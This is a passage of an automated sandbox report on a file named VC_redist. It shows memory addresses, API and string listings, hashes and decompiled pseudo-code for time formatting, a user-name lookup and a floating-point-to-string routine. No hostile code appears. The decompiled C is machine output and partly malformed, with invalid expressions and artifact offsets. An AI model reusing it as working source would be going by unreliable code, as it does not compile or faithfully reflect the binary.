                                                                          0x000587a8
                                                                          0x000587ab
                                                                          0x000587ac
                                                                          0x000587b0
                                                                          0x000587b9
                                                                          0x000587ba
                                                                          0x000587bd
                                                                          0x000587c0
                                                                          0x000587c1
                                                                          0x000587c4
                                                                          0x000587c9
                                                                          0x000587ce
                                                                          0x000587d3
                                                                          0x000587d8
                                                                          0x000587dd
                                                                          0x000587e9
                                                                          0x00058754
                                                                          0x00058758
                                                                          0x0005875d
                                                                          0x00058762
                                                                          0x00058767
                                                                          0x0005876c
                                                                          0x00058777
                                                                          0x0005877c
                                                                          0x00058800

                                                                          APIs
                                                                          • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 00058788
                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 0005879A
                                                                          Strings
                                                                          • crypt32.dll, xrefs: 00058758
                                                                          • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 000587E3
                                                                          • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 00058771
                                                                          • feclient.dll, xrefs: 00058762
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$InformationLocalSpecificSystemZone
                                                                          • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                          • API String ID: 1772835396-1985132828
                                                                          • Opcode ID: 8532cbccf5f96fb7dfb2c3bcf232e832d9669f951fa1ab582914e7099287f4d7
                                                                          • Instruction ID: 896bdd48d1f9a4ae447357147174246e341ffbee0da6ac0e6ca5c7df3ebbba59
                                                                          • Opcode Fuzzy Hash: 8532cbccf5f96fb7dfb2c3bcf232e832d9669f951fa1ab582914e7099287f4d7
                                                                          • Instruction Fuzzy Hash: EC21FCA6900118BAE7249B959D05FBBB3FDEB48B12F10445AFA45E6080E738AD85D770
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000160BA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E000160BA(void* __ebx, void* __edx, intOrPtr _a8) {
				signed int _v8;
				short _v524;
				long _v528;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t8;
				void* _t20;
				void* _t25;
				intOrPtr _t26;
				void* _t27;
				signed int _t30;

				_t25 = __edx;
				_t20 = __ebx;
				_t8 =  *0x7a008; // 0xfbf51acb
				_v8 = _t8 ^ _t30;
				_t26 = _a8;
				_v528 = 0x101;
				if(GetUserNameW( &_v524,  &_v528) != 0) {
					L3:
					_t27 = E000302F4(_t26,  &_v524, 0);
					if(_t27 < 0) {
						_push("Failed to set variant value.");
						goto L5;
					}
				} else {
					_t27 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
					if(_t27 >= 0) {
						goto L3;
					} else {
						E000137D3(_t18, "variable.cpp", 0x8e5, _t27);
						_push("Failed to get the user name.");
						L5:
						_push(_t27);
						E0005012F();
					}
				}
				return E0003DE36(_t20, _v8 ^ _t30, _t25, _t26, _t27);
			}















                                                                          0x000160ba
                                                                          0x000160ba
                                                                          0x000160c3
                                                                          0x000160ca
                                                                          0x000160cf
                                                                          0x000160df
                                                                          0x000160f2
                                                                          0x00016123
                                                                          0x00016132
                                                                          0x00016136
                                                                          0x00016138
                                                                          0x00000000
                                                                          0x00016138
                                                                          0x000160f4
                                                                          0x00016105
                                                                          0x0001610a
                                                                          0x00000000
                                                                          0x0001610c
                                                                          0x00016117
                                                                          0x0001611c
                                                                          0x0001613d
                                                                          0x0001613d
                                                                          0x0001613e
                                                                          0x00016144
                                                                          0x0001610a
                                                                          0x00016156

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastNameUser
                                                                          • String ID: @Met$Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 2054405381-1817914153
                                                                          • Opcode ID: 8545c92d065730bc1d31cb62ff59c9e1790551e7f202c6c324aba12a40dcde99
                                                                          • Instruction ID: 777b11d6309ed5790f5a26d54e457e24b6b8db3f6c6b27262498c51c663485b3
                                                                          • Opcode Fuzzy Hash: 8545c92d065730bc1d31cb62ff59c9e1790551e7f202c6c324aba12a40dcde99
                                                                          • Instruction Fuzzy Hash: 2101B972A013296BE721EB65DC09EEF77ACDF00721F10415AFC05E7282EE759E4886D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004A85E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODECrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E0004A85E(void* __ebx, signed int __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void* _t1017;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				unsigned int _t1127;
				void* _t1131;
				void* _t1132;
				unsigned int _t1133;
				signed int _t1138;
				signed int _t1139;
				signed int _t1141;
				signed int _t1142;
				intOrPtr* _t1144;
				signed int _t1145;
				signed int _t1146;
				void* _t1148;
				signed int _t1149;
				signed int _t1150;
				signed int _t1153;
				signed int _t1155;
				signed int _t1156;
				void* _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				void* _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int* _t1171;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				intOrPtr* _t1177;
				intOrPtr* _t1178;
				signed int _t1180;
				signed int _t1182;
				signed int _t1185;
				signed int _t1191;
				signed int _t1195;
				signed int _t1196;
				intOrPtr _t1198;
				intOrPtr _t1199;
				void* _t1200;
				signed int _t1204;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1225;
				signed int _t1226;
				signed int _t1228;
				signed int _t1230;
				signed int _t1232;
				signed int _t1234;
				signed int* _t1236;
				signed int* _t1240;
				signed int _t1249;

				_t1101 = __edx;
				_t725 =  *0x7a008; // 0xfbf51acb
				_v8 = _t725 ^ _t1234;
				_push(__ebx);
				_t1016 = _a20;
				_t1144 = _a16;
				_v1924 = _t1144;
				_v1920 = _t1016;
				E0004A37D( &_v1944, __eflags);
				_t1195 = _a8;
				_t730 = 0x2d;
				if((_t1195 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1144 = _t730;
				 *((intOrPtr*)(_t1144 + 8)) = _t1016;
				_t1145 = _a4;
				if((_t1195 & 0x7ff00000) != 0) {
					L5:
					_t735 = E000469EC( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1145;
									_a8 = _t1195 & 0x7fffffff;
									_t1249 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1149 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1149 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1102 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1102 = 1;
									}
									_t1150 = _t1149 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1102;
									_t1037 = _t1036 & 0x000007ff;
									_t1204 = _t1037 - 0x434 + (0 | _t1102 != 0x00000000) + 1;
									_v1872 = _t1204;
									E0004C790(_t1037, _t1249);
									_push(_t1037);
									_push(_t1037);
									 *_t1236 = _t1249;
									_t764 = E00059E40(E0004C8A0(), _t1249);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1150;
									_v464 = _t1150;
									_t1022 = (0 | _t1150 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1204;
									if(_t1204 < 0) {
										__eflags = _t1204 - 0xfffffc02;
										if(_t1204 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1234 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1236 =  &(_t1236[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1222 = _t1068;
														_t1177 =  &_v468 + _t1068 * 4;
														_v1880 = _t1177;
														while(1) {
															__eflags = _t1222 - _t1022;
															if(_t1222 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1177;
															}
															_t210 = _t1222 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1127 = 0;
																__eflags = 0;
															} else {
																_t1127 =  *(_t1177 - 4);
															}
															_t1177 = _t1177 - 4;
															_t936 = _v1880;
															_t1222 = _t1222 - 1;
															 *_t936 = _t1127 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1222 - 0xffffffff;
															if(_t1222 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1204 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1153 = 1 - _t1204;
											E0003F670(_t1153,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1234 + 0xbad63d) = 1 << (_t1153 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1131 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1234 + _t1131 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1234 + _t1131 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1234 + _t1131 - 0x1d0))) {
														goto L101;
													}
													_t1131 = _t1131 + 4;
													__eflags = _t1131 - 8;
													if(_t1131 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1132 = 0;
															__eflags = 0;
														} else {
															_t1132 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1223 = _t1069;
														__eflags = _t939 - _t1132 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1178 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1132 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1178;
															}
															_t175 = _t1223 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1133 = 0;
																__eflags = 0;
															} else {
																_t1133 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t945 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t945 = _t1133 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1180 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1225 = _t1180 << 2;
														E0003F670(_t1180,  &_v1396, 0, _t1225);
														 *(_t1234 + _t1225 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1180 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1240 =  &(_t1236[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1226 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1226;
										__eflags = _t1022 - _t1226;
										if(_t1022 != _t1226) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1182 = _t956 >> 5;
											_v1872 = _t1182;
											_v1908 = _t1073 - _t957;
											_t960 = E00059E20(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1234 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1138 = _t1022 + _t1182;
											__eflags = _v1876 - _t964;
											_v1892 = _t1138;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1138 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1138 - 0x00000073 > 0x00000000;
											__eflags = _t1138 - 0x73;
											if(_t1138 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1236 =  &(_t1236[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1138 - _t1078;
													if(_t1138 >= _t1078) {
														_t1138 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1138;
													_v1880 = _t974;
													__eflags = _t1138 - 0xffffffff;
													if(_t1138 != 0xffffffff) {
														_t1139 = _v1872;
														_t1228 = _t1138 - _t1139;
														__eflags = _t1228;
														_t1082 =  &_v468 + _t1228 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1139;
															if(_t974 < _t1139) {
																break;
															}
															__eflags = _t1228 - _t1022;
															if(_t1228 >= _t1022) {
																_t1185 = 0;
																__eflags = 0;
															} else {
																_t1185 =  *_t1082;
															}
															__eflags = _t1228 - 1 - _t1022;
															if(_t1228 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1234 + _t982 * 4 - 0x1d0) = (_t1185 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1228 = _t1228 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1138 = _v1892;
														_t1182 = _v1872;
														_t1226 = 2;
													}
													__eflags = _t1182;
													if(_t1182 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1182 << 2);
														_t1236 =  &(_t1236[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1138;
													} else {
														_v472 = _t1138 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1226;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1234 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1234 + _t1086 - 0x1d0));
												if( *((intOrPtr*)(_t1234 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1234 + _t1086 - 0x1d0))) {
													goto L53;
												}
												_t1086 = _t1086 + 4;
												__eflags = _t1086 - 8;
												if(_t1086 != 8) {
													continue;
												} else {
													_t985 = _v1872 + 2;
													_t986 = _t985 & 0x0000001f;
													_t1087 = 0x20;
													_t1088 = _t1087 - _t986;
													_v1888 = _t986;
													_t1230 = _t985 >> 5;
													_v1876 = _t1230;
													_v1908 = _t1088;
													_t989 = E00059E20(1, _t1088, 0);
													_v1896 = _v1896 & 0x00000000;
													_t990 = _t989 - 1;
													__eflags = _t990;
													asm("bsr ecx, edi");
													_v1884 = _t990;
													_v1912 =  !_t990;
													if(_t990 == 0) {
														_t1089 = 0;
														__eflags = 0;
													} else {
														_t1089 = _t1088 + 1;
													}
													_t992 = 0x20;
													_t993 = _t992 - _t1089;
													_t1141 = _t1230 + 2;
													__eflags = _v1888 - _t993;
													_v1880 = _t1141;
													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
													__eflags = _t1141 - 0x73;
													_v1865 = _t994;
													_t1090 = _t1089 & 0xffffff00 | _t1141 - 0x00000073 > 0x00000000;
													__eflags = _t1141 - 0x73;
													if(_t1141 != 0x73) {
														L28:
														_t995 = 0;
														__eflags = 0;
													} else {
														__eflags = _t994;
														if(_t994 == 0) {
															goto L28;
														} else {
															_t995 = 1;
														}
													}
													__eflags = _t1090;
													if(_t1090 != 0) {
														L50:
														__eflags = 0;
														_t1025 = 0x1cc;
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(0x1cc);
														_push( &_v468);
														L313();
														_t1236 =  &(_t1236[4]);
													} else {
														__eflags = _t995;
														if(_t995 != 0) {
															goto L50;
														} else {
															_t1093 = 0x72;
															__eflags = _t1141 - _t1093;
															if(_t1141 >= _t1093) {
																_t1141 = _t1093;
																_v1880 = _t1093;
															}
															_t1094 = _t1141;
															_v1892 = _t1094;
															__eflags = _t1141 - 0xffffffff;
															if(_t1141 != 0xffffffff) {
																_t1142 = _v1876;
																_t1232 = _t1141 - _t1142;
																__eflags = _t1232;
																_t1004 =  &_v468 + _t1232 * 4;
																_v1872 = _t1004;
																while(1) {
																	__eflags = _t1094 - _t1142;
																	if(_t1094 < _t1142) {
																		break;
																	}
																	__eflags = _t1232 - _t1022;
																	if(_t1232 >= _t1022) {
																		_t1191 = 0;
																		__eflags = 0;
																	} else {
																		_t1191 =  *_t1004;
																	}
																	__eflags = _t1232 - 1 - _t1022;
																	if(_t1232 - 1 >= _t1022) {
																		_t1006 = 0;
																		__eflags = 0;
																	} else {
																		_t1006 =  *(_v1872 - 4);
																	}
																	_t1099 = _v1892;
																	 *(_t1234 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1191 & _v1884) << _v1888;
																	_t1094 = _t1099 - 1;
																	_t1232 = _t1232 - 1;
																	_t1004 = _v1872 - 4;
																	_v1892 = _t1094;
																	_v1872 = _t1004;
																	__eflags = _t1094 - 0xffffffff;
																	if(_t1094 != 0xffffffff) {
																		_t1022 = _v472;
																		continue;
																	}
																	break;
																}
																_t1141 = _v1880;
																_t1230 = _v1876;
															}
															__eflags = _t1230;
															if(_t1230 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1230 << 2);
																_t1236 =  &(_t1236[3]);
															}
															__eflags = _v1865;
															_t1025 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1141;
															} else {
																_v472 = _t1141 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t999 = 4;
													__eflags = 1;
													_v1396 = _t999;
													_v1400 = 1;
													_v936 = 1;
													_push(_t999);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1025);
										_push( &_v932);
										L313();
										_t1240 =  &(_t1236[4]);
									}
									_t782 = _v1904;
									_t1043 = 0xa;
									_v1912 = _t1043;
									__eflags = _t782;
									if(_t782 < 0) {
										_t783 =  ~_t782;
										_t784 = _t783 / _t1043;
										_v1880 = _t784;
										_t1044 = _t783 % _t1043;
										_v1884 = _t1044;
										__eflags = _t784;
										if(_t784 == 0) {
											L249:
											__eflags = _t1044;
											if(_t1044 != 0) {
												_t820 =  *(0x73414 + _t1044 * 4);
												_v1896 = _t820;
												__eflags = _t820;
												if(_t820 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t820 - 1;
													if(_t820 != 1) {
														_t1055 = _v472;
														__eflags = _t1055;
														if(_t1055 != 0) {
															_t1160 = 0;
															_t1212 = 0;
															__eflags = 0;
															do {
																_t1112 = _t820 *  *(_t1234 + _t1212 * 4 - 0x1d0) >> 0x20;
																 *(_t1234 + _t1212 * 4 - 0x1d0) = _t820 *  *(_t1234 + _t1212 * 4 - 0x1d0) + _t1160;
																_t820 = _v1896;
																asm("adc edx, 0x0");
																_t1212 = _t1212 + 1;
																_t1160 = _t1112;
																__eflags = _t1212 - _t1055;
															} while (_t1212 != _t1055);
															__eflags = _t1160;
															if(_t1160 != 0) {
																_t826 = _v472;
																__eflags = _t826 - 0x73;
																if(_t826 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1234 + _t826 * 4 - 0x1d0) = _t1160;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t784 - 0x26;
												if(_t784 > 0x26) {
													_t784 = 0x26;
												}
												_t1056 =  *(0x7337e + _t784 * 4) & 0x000000ff;
												_v1872 = _t784;
												_v1400 = ( *(0x7337e + _t784 * 4) & 0x000000ff) + ( *(0x7337f + _t784 * 4) & 0x000000ff);
												E0003F670(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
												_t837 = E0003F0F0( &(( &_v1396)[_t1056]), 0x72a78 + ( *(0x7337c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x7337f + _t784 * 4) & 0x000000ff) << 2);
												_t1057 = _v1400;
												_t1240 =  &(_t1240[6]);
												_v1892 = _t1057;
												__eflags = _t1057 - 1;
												if(_t1057 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1057 - _v472;
														_t1163 =  &_v1396;
														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
														__eflags = _t838;
														if(_t838 != 0) {
															_t1113 =  &_v468;
														} else {
															_t1163 =  &_v468;
															_t1113 =  &_v1396;
														}
														_v1908 = _t1113;
														__eflags = _t838;
														if(_t838 == 0) {
															_t1057 = _v472;
														}
